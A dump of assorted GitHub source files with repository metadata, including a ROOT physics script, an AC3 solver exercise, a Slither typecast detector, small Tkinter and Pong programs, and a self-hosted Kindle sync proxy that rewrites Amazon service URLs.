electronDataSource.Get('Ph22IdIso_ptEta_eff')\n\nelectronMCSource = ROOT.TFile('/afs/cern.ch/user/y/yiiyama/output/GammaL/triggers/electron/dy.root')\nelectronMCHLT = electronMCSource.Get('Ph22IdIso_etaNVtx_eff')\n#electronMCHLT = electronMCSource.Get('Ph22IdIso_ptEta_eff')\n\nhltSFOutputFile.cd()\nelectron = electronDataHLT.Clone('electron')\n\nfor iX in range(1, electron.GetNbinsX() + 1):\n for iY in range(1, electron.GetNbinsY() + 1):\n bin = electron.GetBin(iX, iY)\n\n sf = electronDataHLT.GetBinContent(bin) / electronMCHLT.GetBinContent(bin)\n relErr2 = 0.\n try:\n relErr = electronDataHLT.GetBinError(bin) / electronDataHLT.GetBinContent(bin)\n except ZeroDivisionError:\n relErr = 0.\n relErr2 += relErr * relErr\n relErr = electronMCHLT.GetBinError(bin) / electronMCHLT.GetBinContent(bin)\n relErr2 += relErr * relErr\n\n electron.SetBinContent(bin, sf)\n electron.SetBinError(bin, sf * math.sqrt(relErr2))\n\nelectronDataSource.Close()\nelectronMCSource.Close()\n\nmuonDataSource = ROOT.TFile('/afs/cern.ch/user/y/yiiyama/output/GammaL/triggers/mueg_mu/data.root')\nmuonDataHLT = muonDataSource.Get('Mu22_eta_eff')\n\nmuonMCSource = ROOT.TFile('/afs/cern.ch/user/y/yiiyama/output/GammaL/triggers/mueg_mu/zg.root')\nmuonMCHLT = muonMCSource.Get('Mu22_eta_eff')\n\nhltSFOutputFile.cd()\nmuon = muonDataHLT.Clone('muon')\n\nfor bin in range(1, muon.GetNbinsX() + 1):\n sf = muonDataHLT.GetBinContent(bin) / muonMCHLT.GetBinContent(bin)\n relErr2 = 0.\n relErr = muonDataHLT.GetBinError(bin) / muonDataHLT.GetBinContent(bin)\n relErr2 += relErr * relErr\n relErr = muonMCHLT.GetBinError(bin) / muonMCHLT.GetBinContent(bin)\n relErr2 += relErr * relErr\n\n muon.SetBinContent(bin, sf)\n muon.SetBinError(bin, sf * math.sqrt(relErr2))\n\nmuonDataSource.Close()\nmuonMCSource.Close()\n\nmuegDataSource = ROOT.TFile('/afs/cern.ch/user/y/yiiyama/output/GammaL/triggers/mueg_cross/data.root')\nmuegDataHLT = muegDataSource.Get('Mu3p5EG12_inclusive_eff')\n\nmuegMCSource = ROOT.TFile('/afs/cern.ch/user/y/yiiyama/output/GammaL/triggers/mueg_cross/zg.root')\nmuegMCHLT = muegMCSource.Get('Mu3p5EG12_inclusive_eff')\n\nhltSFOutputFile.cd()\nmueg = muegDataHLT.Clone('mueg')\n\nsf = muegDataHLT.GetBinContent(1) / muegMCHLT.GetBinContent(1)\nrelErr2 = 0.\nrelErr = muegDataHLT.GetBinError(1) / muegDataHLT.GetBinContent(1)\nrelErr2 += relErr * relErr\nrelErr = muegMCHLT.GetBinError(1) / muegMCHLT.GetBinContent(1)\nrelErr2 += relErr * relErr\n\nmueg.SetBinContent(1, sf)\nmueg.SetBinError(1, sf * math.sqrt(relErr2))\n\nmuegDataSource.Close()\nmuegMCSource.Close()\n\nhltSFOutputFile.cd()\nhltSFOutputFile.Write()\nhltSFOutputFile.Close()\n\n\nsamples = [('WGToLNuG', 'wg'), ('ZGToLLG', 'zg'), ('TTGJets', 'ttg')]\nplots = [('photon_e', 'photon', ('SingleEG22', 'Ph36IdIso'), 'etaNVtx'), ('photon_mu', 'mueg_ph', 'Ph22CaloIdL', 'etaNVtx'), ('electron', 'electron', 'Ph22IdIso', 'etaNVtx'), ('muon', 'mueg_mu', 'Mu22', 'eta')]\n#plots = [('photon_e', 'photon', ('SingleEG22', 'Ph36IdIso'), 'ptEta'), ('photon_mu', 'mueg_ph', 'Ph22CaloIdL', 'inclusive'), ('electron', 'electron', 'Ph22IdIso', 'ptEta'), ('muon', 'mueg_mu', 'Mu22', 'ptEta')]\n\nfor fullname, shortname in samples:\n effOutputFile = ROOT.TFile('/afs/cern.ch/user/y/yiiyama/output/GammaL/main/hltEfficiency/' + fullname + '.root', 'recreate')\n for obj, measName, filterName, var in plots:\n source = ROOT.TFile('/afs/cern.ch/user/y/yiiyama/output/GammaL/triggers/' + measName + '/' + shortname + '.root')\n eff = None\n if type(filterName) is tuple:\n if var == 'inclusive':\n raise RuntimeError('Cannot multiply graphs')\n \n for filt in filterName:\n if not eff:\n eff = source.Get(filt + '_' + var + '_eff')\n else:\n eff.Multiply(source.Get(filt + '_' + var + '_eff'))\n else:\n eff = source.Get(filterName + '_' + var + '_eff')\n\n eff.SetName(obj + '_eff')\n eff.SetDirectory(effOutputFile)\n effOutputFile.cd()\n eff.Write()\n\n source.Close()\n\n effOutputFile.Close()\n","repo_name":"yiiyama/plotstack","sub_path":"GammaL/effSources.py","file_name":"effSources.py","file_ext":"py","file_size_in_byte":14389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"72323059672","text":"# -*- coding: utf-8 -*-\nfrom p2_is_consistent import is_consistent\nfrom p1_is_complete import is_complete\n__author__ = 'Please write your names, separated by commas.'\n__email__ = 'Please write your email addresses, separated by commas.'\n\nfrom collections import deque\n\n\ndef ac3(csp, arcs=None):\n \"\"\"Executes the AC3 or the MAC (p.218 of the textbook) algorithms.\n\n If the parameter 'arcs' is None, then this method executes AC3 - that is, it will check the arc consistency\n for all arcs in the CSP. Otherwise, this method starts with only the arcs present in the 'arcs' parameter\n in the queue.\n\n Note that the current domain of each variable can be retrieved by 'variable.domains'.\n\n This method returns True if the arc consistency check succeeds, and False otherwise.\"\"\"\n #print \"============BEGIN==================\"\n\n queue_arcs = deque(arcs if arcs is not None else csp.constraints.arcs())\n\n \"\"\"\n print \"QUEUE ARCS\"\n for x in queue_arcs:\n print x\n print \"fin queue arcs\"\n print \"\\nconstraints\"\n for x in csp.constraints:\n print x\n print \"end constraints\"\n \"\"\"\n while queue_arcs:\n (v1, v2) = queue_arcs.pop()\n #print str(v1) + \"---\"+ str(v2)\n if revise(csp, v1, v2):\n if not v1.domain:\n return False\n #print str(v1)+ \"LOOK HEREREREREREREAFVSD\"\n for c in csp.constraints[v1]:\n #print \"WTF IS THE ARC\" + str(c)\n if c.var2 != v1 and c.var2 != v2:\n queue_arcs.append((c.var2,v1))\n\n \"\"\"print \"AC3 IS RETURNING TRUE\"\n for x in queue_arcs:\n print x\"\"\"\n\n return True\n \n\n # TODO implement this\n pass\n\ndef revise(csp, xi, xj):\n # You may additionally want to implement the 'revise' method.\n flag = False\n for x in xi.domain:\n count = 0\n for constrain in csp.constraints[xi]:\n #print \"THIS IS THE CONSTRAINT \" + str(constrain) + \"AND THIS IS VAL \" + x\n for y in xj.domain:\n #print str(x) + \" &*&*(^& WHAT THE ACTUAL FUCK \" + str(y)\n if (constrain.var2 == xj and (constrain.is_satisfied(x, y))):\n count += 1\n if count == 0:\n flag = True\n xi.domain.remove(x)\n #print \"THIS IS THE REVISE FLAG RETURNED \" + str(flag)\n return flag\n\n\n\n\n\n\"\"\"\n flag = False\n exists = 0\n print str(xi) + \" revised with \" + str(xj)\n print csp.constraints[xi]\n for x in xi.domain:\n print x\n if not any([(con.is_satisfied(x,y) for con in csp.constraints[xi]) for y in xj.domain]):\n print \"REVISE CONSR3R12385780&&*(^798\"\n flag = True\n xi.domain.remove(x)\n for q in csp.variables:\n if q == xi:\n q.domain.remove(x)\n return flag\n if exists == 0:\n flag = True\n for val in csp.variables:\n if val == xj:\n val.domain.remove(x)\n\n if flag = True:\n for var in csp.variables:\n if var = xi:\n csp.\n pass\n\"\"\"","repo_name":"bashlord/Heuristics","sub_path":"AC3/solutions/p4_ac3.py","file_name":"p4_ac3.py","file_ext":"py","file_size_in_byte":3086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"627890250","text":"import numpy as np\nfrom cosapp.base import System\nfrom OCC.Core.BRepAlgoAPI import BRepAlgoAPI_Fuse\nfrom OCC.Core.BRepGProp import brepgprop\nfrom OCC.Core.gp import gp_Pnt, gp_Vec\nfrom OCC.Core.GProp import GProp_GProps\nfrom OCC.Core.TopoDS import TopoDS_Compound\nfrom pyoccad.create import CreateEdge, CreateExtrusion, CreateFace, CreateTopology, CreateWire\n\n\nclass WingsGeom(System):\n \"\"\"Pyoccad model of a set of wings.\n\n Inputs\n ------\n\n Outputs\n ------\n shape: TopoDS_Compound,\n pyoccad model\n props: GProp_GProps,\n model properties\n \"\"\"\n\n def setup(self):\n\n # Geometric parameters\n self.add_inward(\"n\", 4, desc=\"Number of wings\", unit=\"\")\n self.add_inward(\"l_in\", 1.0, desc=\"rocket edge length\", unit=\"m\")\n self.add_inward(\"l_out\", 0.5, desc=\"free edge length\", unit=\"m\")\n self.add_inward(\"width\", 4 / 3, desc=\"width\", unit=\"m\")\n self.add_inward(\"th\", 0.1, desc=\"thickness\", unit=\"m\")\n\n # Density\n self.add_inward(\"rho\", 10.0, desc=\"density\", unit=\"kg/m**3\")\n\n # Positional parameters\n self.add_inward(\"radius\", 1.0, desc=\"radius of the set\", unit=\"m\")\n self.add_inward(\"pos\", 0.0, desc=\"lowest point z-coordinate\", unit=\"m\")\n\n # Outputs\n self.add_outward(\"shape\", TopoDS_Compound(), desc=\"pyoccad model\")\n self.add_outward(\"props\", GProp_GProps(), desc=\"model properties\")\n\n def compute(self):\n\n self.shape = self.create_wings(\n self.n, self.radius, self.pos, self.l_in, self.l_out, self.width, self.th\n )\n vprop = GProp_GProps()\n brepgprop.VolumeProperties(self.shape, vprop)\n self.props = GProp_GProps()\n self.props.Add(vprop, self.rho)\n\n def create_wings(self, n_wings, radius, pos, l_in, l_out, width, th):\n \"\"\"Create a pyoccad model of a set of wings.\n\n Inputs\n ------\n n_wings: int,\n the number of wings\n radius: float,\n the distance of the internal edges to the center\n pos: float,\n the lower edges' z-coordinate\n l_in: float,\n the length of the inner edges\n l_out: float,\n the length of the outer edges\n width: float,\n width\n th: float,\n thickness\n\n Outputs\n ------\n\n fusion: TopoDS_Solid,\n pyoccad model of the set of wings\n \"\"\"\n\n theta = 2 * np.pi / n_wings\n shapes = [None] * n_wings\n\n for i in range(n_wings):\n\n ang = theta * i\n\n p1 = gp_Pnt(radius * np.cos(ang), radius * np.sin(ang), pos)\n p2 = gp_Pnt((radius + width) * np.cos(ang), (radius + width) * np.sin(ang), pos)\n p3 = gp_Pnt((radius + width) * np.cos(ang), (radius + width) * np.sin(ang), pos + l_out)\n p4 = gp_Pnt(radius * np.cos(ang), radius * np.sin(ang), pos + l_in)\n\n edge1 = CreateEdge().from_2_points(p1, p2)\n edge2 = CreateEdge().from_2_points(p2, p3)\n edge3 = CreateEdge().from_2_points(p3, p4)\n edge4 = CreateEdge().from_2_points(p4, p1)\n\n contour = CreateWire().from_elements([edge1, edge2, edge3, edge4])\n face = CreateFace().from_contour(contour)\n shell = CreateExtrusion().surface(face, gp_Vec(-th * np.sin(ang), th * np.cos(ang), 0))\n shapes[i] = CreateTopology().make_solid(shell)\n\n fusion = BRepAlgoAPI_Fuse(shapes[0], shapes[1]).Shape()\n\n for i in range(2, n_wings):\n fusion = BRepAlgoAPI_Fuse(fusion, shapes[i]).Shape()\n\n return fusion\n","repo_name":"twiinIT/rocket-twin","sub_path":"rocket_twin/systems/structure/wings_geom.py","file_name":"wings_geom.py","file_ext":"py","file_size_in_byte":3615,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"1916752639","text":"import asyncio\nimport logging\nimport sys\nfrom threading import Thread\nfrom glob import glob\n\nfrom input import sierra\nfrom sessions import Session\nfrom utils.logging import log\n\n\nclass Service:\n def __init__(self):\n self.thread = Thread(target=Service.thread)\n\n @staticmethod\n def thread():\n log.info('Starting Session ...')\n asyncio.run(session.gather())\n\n def start(self):\n self.thread.start()\n\n\nclass API:\n def __init__(self):\n self.thread = Thread(target=API.thread)\n\n @staticmethod\n def thread():\n log.info('Starting API ...')\n sys.modules['flask.cli'].show_server_banner = lambda *x: None\n logging.getLogger(\"werkzeug\").setLevel(logging.ERROR)\n sierra.run(port=8008)\n\n def start(self):\n self.thread.start()\n\n\nif __name__ == '__main__':\n with Session() as session:\n saves = glob('saves/*.sierra')\n if saves:\n if input('Load history from previous session? (y/N): ').lower().startswith('y'):\n log.info(''.join([f'{i}: {save}\\n' for i, save in enumerate(saves)]))\n index = int(input('Load save: '))\n session.load(saves[index])\n\n Service().start()\n API().start()\n session.windows.start()\n","repo_name":"StarCityIndustries/sierra","sub_path":"sierra.py","file_name":"sierra.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"70915115032","text":"from typing import List, Tuple\nfrom slither.detectors.abstract_detector import AbstractDetector, DetectorClassification\nfrom slither.slithir.operations import TypeConversion, Operation\nfrom slither.core.declarations import FunctionContract\nfrom slither.core.cfg.node import Node\n\n\ndef is_ok_cast(from_type: str, to_type: str) -> bool:\n if from_type == to_type:\n return True\n if from_type == \"address\" or to_type == \"address\":\n # address <-> interface/contract/this\n # address <-> uint160 (solidity doesn't allow other direct casts of address)\n return True\n\n if \"bytes\" in from_type and \"bytes\" in to_type:\n # bytesX <-> bytesY will have different results\n return False\n\n if \"bytes\" in from_type or \"bytes\" in to_type:\n return True\n\n if \"uint\" == from_type[:4] and \"uint\" in to_type[:4]:\n size_from = from_type[4:]\n if size_from == \"\":\n size_from = \"256\"\n\n size_to = to_type[4:]\n if to_type == \"\":\n size_to = \"256\"\n\n if int(size_from) > int(size_to):\n return False\n return True\n\n if \"int\" == from_type[:3] and \"int\" == to_type[:3]:\n size_from = from_type[3:]\n if size_from == \"\":\n size_from = \"256\"\n\n size_to = to_type[3:]\n if to_type == \"\":\n size_to = \"256\"\n\n if int(size_from) > int(size_to):\n return False\n return True\n\n sorted_types = sorted([from_type, to_type])\n if \"int\" == sorted_types[0][:3] and \"uint\" == sorted_types[1][:4]:\n return False\n\n return True\n\n\nclass DubiousTypecast(AbstractDetector):\n \"\"\"\n Shows nonstandard typecasts.\n \"\"\"\n\n ARGUMENT = \"pess-dubious-typecast\" # slither will launch the detector with slither.py --detect mydetector\n HELP = \"uint8 = uint8(uint256)\"\n IMPACT = DetectorClassification.MEDIUM\n CONFIDENCE = DetectorClassification.HIGH\n\n WIKI = \"https://github.com/pessimistic-io/slitherin/blob/master/docs/dubious_typecast.md\"\n WIKI_TITLE = \"Dubious Typecast\"\n WIKI_DESCRIPTION = \"Check docs\"\n WIKI_EXPLOIT_SCENARIO = (\n \"Can produce unpredictable results because of nonstandard typecasts\"\n )\n WIKI_RECOMMENDATION = \"Use clear constants\"\n\n def analyze_irs(self, irs: List[Operation]) -> List[Tuple[str, str]]:\n results = []\n for i in irs:\n try:\n if isinstance(i, TypeConversion):\n from_type = i.variable.type\n to_type = i.type\n\n if not (is_ok_cast(str(from_type), str(to_type))):\n results.append((from_type, to_type))\n except Exception as e:\n print(\"DubiousTypecast:Failed to check types\", e)\n print(i)\n\n return results\n\n def get_dubious_typecasts(self, fun: FunctionContract, params=None):\n results: List[Tuple[Node, List[Tuple[str, str]]]] = []\n for node in fun.nodes:\n node_res = self.analyze_irs(node.irs)\n if node_res:\n results.append((node, node_res))\n return results\n\n def _detect(self):\n results = []\n for contract in self.compilation_unit.contracts_derived:\n for f in contract.functions:\n func_res = self.get_dubious_typecasts(f)\n if func_res:\n info = [\"Dubious typecast in \", f, \":\\n\"]\n for node, node_res in func_res:\n for from_type, to_type in node_res:\n info += [\n f\"\\t{str(from_type)} => {str(to_type)} casting occurs in \",\n node,\n \"\\n\",\n ]\n res = self.generate_result(info)\n res.add(f)\n results.append(res)\n\n return results\n","repo_name":"pessimistic-io/slitherin","sub_path":"slither_pess/detectors/dubious_typecast.py","file_name":"dubious_typecast.py","file_ext":"py","file_size_in_byte":3915,"program_lang":"python","lang":"en","doc_type":"code","stars":298,"dataset":"github-code","pt":"5"} +{"seq_id":"6127788932","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: Raymond F. Pauszek III, Ph.D. (2020)\nsmtirf >> gui >> plots >> canvases_traceviewer\n\"\"\"\nfrom matplotlib.gridspec import GridSpec\nimport matplotlib as mpl\n\nfrom . import QtCanvas, ScrollableCanvas, InteractiveCanvas\n\n__all__ = [\"TraceViewerPlot\"]\n\nclass TraceViewerPlot(ScrollableCanvas, InteractiveCanvas):\n\n def connect(self):\n super().connect()\n self.controller.currentTraceChanged.connect(self.update_plots)\n self.controller.traceEdited.connect(self.update_plots)\n self.controller.selectedEdited.connect(self.update_plots)\n self.controller.modelTrained.connect(self.update_plots)\n self.mpl_connect('motion_notify_event', self.controller.motion_notify)\n self.mpl_connect('button_release_event', self.on_release)\n self.controller.experimentLoaded.connect(self.refresh)\n\n def refresh(self, expt):\n for ax in self.fig.axes:\n ax.remove()\n gs = GridSpec(3, 1)\n self.ax1 = self.fig.add_subplot(gs[0], projection=expt.classLabel)\n self.ax2 = self.fig.add_subplot(gs[1], projection=\"donoracceptor\")\n self.ax3 = self.fig.add_subplot(gs[2], projection=\"total\")\n\n self.set_zoom_axes(self.ax1, button=1)\n self.set_baseline_axes(self.ax3, button=3)\n self.draw()\n\n def update_plots(self, trc):\n for ax in self.fig.axes:\n try:\n ax.set_trace(trc)\n except AttributeError:\n # thrown when Experiment type changes, because ref still active\n # til garbage collected\n pass\n self.draw()\n\n def on_release(self, evt):\n if evt.inaxes == self.ax2 and evt.xdata is not None:\n if evt.button == 1: # start\n self.controller.set_trace_start_time(evt.xdata)\n elif evt.button == 3: # stop\n self.controller.set_trace_stop_time(evt.xdata)\n elif evt.inaxes == self.ax1 and evt.button == 3:\n for ax in self.fig.axes:\n ax.unzoom()\n self.draw()\n","repo_name":"rpauszek/smtirf","sub_path":"gui/plots/canvases_traceviewer.py","file_name":"canvases_traceviewer.py","file_ext":"py","file_size_in_byte":2078,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"71112257753","text":"from tkinter import *\nfrom tkinter import ttk\nimport webbrowser\nfrom pyquery import PyQuery as pq\nimport requests\n\ndef näita():\n def scrapimine(klass, lehekülg):\n page = requests.get(lehekülg)\n page_html = page.text\n q = pq(page_html)\n elemendid = q(klass)\n vajalik = []\n for i in range(3, len(elemendid), 3):\n järjend = []\n for j in range(3):\n if (i + j) < len(elemendid) \\\n and q(q(klass)[i + j]).text() != '':\n järjend.append(q(q(klass)[i + j]).text())\n if len(järjend) != 0:\n vajalik.append(järjend)\n return(vajalik)\n\n def linna_valimine(linn, järjend):\n lst = []\n for i in range(len(järjend)):\n if linn in järjend[i]:\n lst.append(järjend[i])\n return lst\n\n spordiüritused = scrapimine('tr td', 'http://www.sport.ee/et/tegevused/spordiuritused')\n tartu = linna_valimine('Tartu', spordiüritused)\n\n app = Toplevel()\n app.geometry(\"400x450+400+100\")\n app.title(\"Sport\")\n\n canvas = Canvas(app,width = 500, height = 500, bg=\"black\")\n canvas.pack(expand = YES, fill = BOTH)\n gif1 = PhotoImage(file = 'LinksPildid/Tartu/sportTartu.gif')\n canvas.create_image(0,75, image = gif1, anchor = NW)\n\n lst = Listbox(app, activestyle='dotbox',\\\n fg='black', highlightbackground='blue',\\\n highlightcolor='green', width=50)\n lst.insert(END,\"Tartu spordiüritused\")\n lst.insert(END,\" \")\n\n for i in range(len(tartu)):\n for j in range(len(tartu[i])):\n lst.insert(END,tartu[i][j])\n\n lst.insert(END,\" \")\n lst.insert(END,\"Rohkem spordivõimalusi Tallinnas saad leida lingides\")\n lst.place(x=50,y=250)\n\n def Link1():\n webbrowser.open(\"http://www.aurakeskus.ee/\")\n button1 = ttk.Button(app, text = \"Ujumine\", command = Link1)\n button1.pack()\n button1.place(x=170, y=10, width=60)\n\n\n def Link2():\n webbrowser.open(\"http://www.volley.ee/\")\n button2 = ttk.Button(app, text = \"Võrkpall\", command = Link2)\n button2.pack()\n button2.place(x=170, y=60, width=60)\n\n def Link3():\n webbrowser.open(\"http://www.myfitness.ee/tartu/t\")\n button3 = ttk.Button(app, text = \"Fitness\", command = Link3)\n button3.pack()\n button3.place(x=270, y=10, width=60)\n\n\n def Link4():\n webbrowser.open(\"http://www.tartutennis.ee/\")\n button4 = ttk.Button(app, text = \"Tennis\", command = Link4)\n button4.pack()\n button4.place(x=270, y=60, width=60)\n\n def Link5():\n webbrowser.open(\"http://sport.ut.ee/\")\n button5 = ttk.Button(app, text = \"Jõusaal\", command = Link5)\n button5.pack()\n button5.place(x=170, y=120, width=60)\n\n app.mainloop()\n","repo_name":"jsutStacy/ProjektPythonChill","sub_path":"Chill/Links/Tartu/sport.py","file_name":"sport.py","file_ext":"py","file_size_in_byte":2799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"11469432219","text":"import sys\nt = int(input())\nres=[]\ndef check(a,b):\n c=0\n if(b==1):\n b+=1\n c+=1\n while(a!=0):\n a//=b\n c+=1\n return c\nfor i in range(t):\n a,b = map(int,input().split())\n c=0\n m=sys.maxsize\n for i in range(0,7):\n c=check(a,b+i)+i\n if(c=(height-half_pad_height) and paddle1_vel>0:\n paddle1_vel=0\n if paddle2_pos<=half_pad_height and paddle2_vel<0:\n paddle2_vel=0\n if paddle2_pos>=(height-half_pad_height) and paddle2_vel>0:\n paddle2_vel=0\n \n paddle1_pos+=paddle1_vel\n paddle2_pos+=paddle2_vel\n \n if ball_pos[0]<=radius+pad_width:\n ball_vel[0]=-ball_vel[0]\n \n #if ball_pos<(paddle1_pos+half_pad_height) and ball_pos[1]>(paddle1_pos-half_pad_height):\n # if ball_pos[0]<=radius+pad_width:\n # ball_vel[0]=-ball_vel[0]\n \n \n if ball_pos[0]>=width-radius-pad_width:\n ball_vel[0]=-ball_vel[0]\n \n if ball_pos[1]<=radius:\n ball_vel[1]=-ball_vel[1]\n if ball_pos[1]>=height-radius:\n ball_vel[1]=-ball_vel[1]\n \n if ball_pos[0]<=radius+pad_width:\n ball_pos[0]=ball_pos[0]+(width/2)\n ball_vel[0]=-ball_vel[0]\n score1=score1+1\n if ball_pos[0]>=width-radius-pad_width:\n ball_pos[0]=ball_pos[0]-(width/2)\n ball_vel[0]=-ball_vel[0]\n score=score+1\n\n \n \n ball_pos[0]+=ball_vel[0]\n ball_pos[1]+=ball_vel[1]\n \n \n \n \n \n \n canvas.draw_polygon([(0, paddle1_pos-half_pad_height), (0, paddle1_pos+half_pad_height), (pad_width+3, paddle1_pos+half_pad_height),(pad_width+3,paddle1_pos-half_pad_height)], pad_width-1, \"White\",\"White\")\n canvas.draw_polygon([(width, paddle2_pos-half_pad_height), (width, paddle2_pos+half_pad_height), (width-pad_width-3, paddle2_pos+half_pad_height),(width-pad_width-3,paddle2_pos-half_pad_height)], pad_width-1, \"White\",\"White\")\n canvas.draw_line([width/2,0],[width/2,height],1,'white')\n canvas.draw_line([pad_width,0],[pad_width,height],1,'white')\n canvas.draw_line([width-pad_width,0],[width-pad_width,height],1,'white')\n canvas.draw_circle(ball_pos,radius,2,'red','white')\n canvas.draw_text(str(score),(400,200),50,'red')\n canvas.draw_text(str(score1),(200,200),50,'red')\n \n \nframe=simplegui.create_frame('pong',width,height)\nframe.set_draw_handler(draw)\nframe.set_keydown_handler(keydown)\nframe.set_keyup_handler(keyup)\nframe.start()\n \n \n \n \n \n \n \n","repo_name":"gouthamkallempudi/ponggame","sub_path":"pong1.py","file_name":"pong1.py","file_ext":"py","file_size_in_byte":3312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"44505852054","text":"import logging\nimport xml.dom.minidom as minidom\n\nfrom handlers.upstream import Upstream\nfrom handlers.dummy import DummyResponse\nfrom handlers.ksp import _servers_config, _first_contact\nfrom handlers import is_uuid, TODO, TODO_PATH\nimport devices, calibre, qxml\nimport config, features\nimport annotations\nfrom annotations.lto import device_lto\n\n\ndef _rewrite_url(request, url):\n\t\"\"\"\n\tcertain responses from the server contain urls pointing to amazon services\n\twe rewrite them to point to our proxy\n\t\"\"\"\n\tif url and config.rewrite_rules:\n\t\tfor pattern, replacement in config.rewrite_rules(request).items():\n\t\t\tm = pattern.search(url)\n\t\t\tif m:\n\t\t\t\turl = url[:m.start()] + m.expand(replacement) + url[m.end():]\n\treturn url\n\ndef _add_item(x_items, action, item_type, key = 'NONE', text = None, priority = 600, sequence = 0, url = None, body = None, **kwargs):\n\titem = qxml.add_child(x_items, 'item')\n\titem.setAttribute('action', str(action))\n\titem.setAttribute('is_incremental', 'false')\n\titem.setAttribute('key', str(key))\n\titem.setAttribute('priority', str(priority))\n\titem.setAttribute('sequence', str(sequence))\n\titem.setAttribute('type', str(item_type))\n\tif url:\n\t\titem.setAttribute('url', url)\n\tif body:\n\t\tqxml.set_text(item, body)\n\telse:\n\t\tfor k, v in kwargs.items():\n\t\t\tqxml.add_child(item, k, str(v))\n\treturn item\n\ndef _filter_item(request, x_items, x_item):\n\taction = x_item.getAttribute('action')\n\titem_type = x_item.getAttribute('type')\n\n\tif action == 'UPLOAD':\n\t\tif item_type in ['MESG', 'LOGS'] and not features.allow_logs_upload:\n\t\t\tx_items.removeChild(x_item)\n\t\t\treturn True\n\t\titem_url = x_item.getAttribute('url')\n\t\tnew_url = _rewrite_url(request, item_url)\n\t\tif new_url != item_url:\n\t\t\tlogging.warn(\"rewrote url %s => %s\", item_url, new_url)\n\t\t\tx_item.setAttribute('url', new_url)\n\t\t\treturn True\n\t\treturn False\n\n\tif action == 'DOWNLOAD':\n\t\titem_key = x_item.getAttribute('key')\n\t\titem_url = x_item.getAttribute('url')\n\t\tif item_url and (item_type == 'CRED' or is_uuid(item_key)):\n\t\t\tnew_url = _rewrite_url(request, item_url)\n\t\t\tif new_url != item_url:\n\t\t\t\tlogging.warn(\"rewrote url for %s: %s => %s\", item_key, item_url, new_url)\n\t\t\t\tx_item.setAttribute('url', new_url)\n\t\t\t\treturn True\n\t\tlogging.warn(\"not rewriting url %s for %s\", item_url, item_key)\n\t\treturn False\n\n\tif action == 'GET':\n\t\tif item_type == 'FWUP' and not features.allow_firmware_updates:\n\t\t\tx_items.removeChild(x_items)\n\t\t\treturn True\n\n\tif action == 'SND' and item_type == 'CMND':\n\t\titem_key = x_item.getAttribute('key')\n\t\tif item_key and item_key.endswith(':SYSLOG:UPLOAD') and not features.allow_logs_upload:\n\t\t\t# not sure if this is smart, ignoring these items appears to queue them up at amazon\n\t\t\tx_items.removeChild(x_item)\n\t\t\treturn True\n\n\treturn False\n\ndef _consume_action_queue(request, device, x_items):\n\twas_updated = False\n\twhile device.actions_queue:\n\t\taction = device.actions_queue.pop()\n\t\t# logging.debug(\"checking action %s\", action)\n\t\tif list(qxml.filter(x_items, 'item', action = action[0], type = action[1])):\n\t\t\t# logging.debug(\"action %s already found in %s, skipping\", action, x_items)\n\t\t\tcontinue\n\t\tif action == 'SET_SCFG':\n\t\t\t_add_item(x_items, 'SET', 'SCFG', key = 'KSP.set.scfg', priority = 100, body = _servers_config(request, device))\n\t\t\twas_updated = True\n\t\telif action == 'UPLOAD_SNAP':\n\t\t\t_add_item(x_items, 'UPLOAD', 'SNAP', key = 'KSP.upload.snap', priority = 1000, url = config.server_url(request) + 'FionaCDEServiceEngine/UploadSnapshot')\n\t\t\twas_updated = True\n\t\t# elif action == 'GET_NAMS':\n\t\t# \t_add_item(x_items, 'GET', 'NAMS', key = 'NameChange' if device.is_kindle() else 'AliasChange')\n\t\t# \twas_updated = True\n\t\telif action == 'UPLOAD_SCFG':\n\t\t\t_add_item(x_items, 'UPLOAD', 'SCFG', key = 'KSP.upload.scfg', priority = 50, url = config.server_url(request) + 'ksp/scfg')\n\t\t\twas_updated = True\n\t\telif type(action) == tuple and action[0] == 'ADD_COLLECTION':\n\t\t\tpass\n\t\telse:\n\t\t\tlogging.warn(\"unknown action %s\", action)\n\treturn was_updated\n\ndef _update_annotations(device, x_items):\n\twas_updated = False\n\n\tfor lr in annotations.get_last_read_updates(device):\n\t\tsource_device = devices.get(lr.device)\n\t\tsource_device_alias = (source_device.alias or source_device.serial) if source_device else lr.device\n\t\t_add_item(x_items, 'UPD_LPRD', 'EBOK', key = lr.asin, priority = 1100, sequence = lr.pos,\n\t\t\t\tsource_device = source_device_alias, lto = device_lto(source_device), annotation_time_utc = lr.timestamp)\n\t\twas_updated = True\n\n\tfor asin in annotations.get_annotation_updates(device):\n\t\t_add_item(x_items, 'UPD_ANOT', 'EBOK', key = asin, priority = 1100)\n\t\twas_updated = True\n\n\treturn was_updated\n\ndef _process_xml(request, doc, device):\n\tx_response = qxml.get_child(doc, 'response')\n\tx_items = qxml.get_child(x_response, 'items')\n\tif not x_items:\n\t\treturn False\n\n\twas_updated = False\n\n\t# rewrite urls\n\tfor x_item in qxml.list_children(x_items, 'item'):\n\t\twas_updated |= _filter_item(request, x_items, x_item)\n\n\twas_updated |= _consume_action_queue(request, device, x_items)\n\twas_updated |= _update_annotations(device, x_items)\n\n\tif features.download_updated_books:\n\t\tfor book in calibre.books().values():\n\t\t\tif book.needs_update_on(device) and book.cde_content_type in ('EBOK', ): # PDOC updates are not supported ATM\n\t\t\t\tlogging.warn(\"book %s updated in library, telling device %s to download it again\", book, device)\n\t\t\t\t_add_item(x_items, 'GET', book.cde_content_type, key = book.asin, title = book.title, forced = True)\n\t\t\t\twas_updated = True\n\n\tif was_updated:\n\t\tx_total_count = qxml.get_child(x_response, 'total_count')\n\t\tqxml.set_text(x_total_count, len(x_items.childNodes))\n\n\treturn was_updated\n\ndef _service_refresh(request, device):\n\tbody = '00' + \\\n\t\t\t\t'\\n'\n\tbody += _servers_config(request, device)\n\tbody += '\\n'\n\treturn 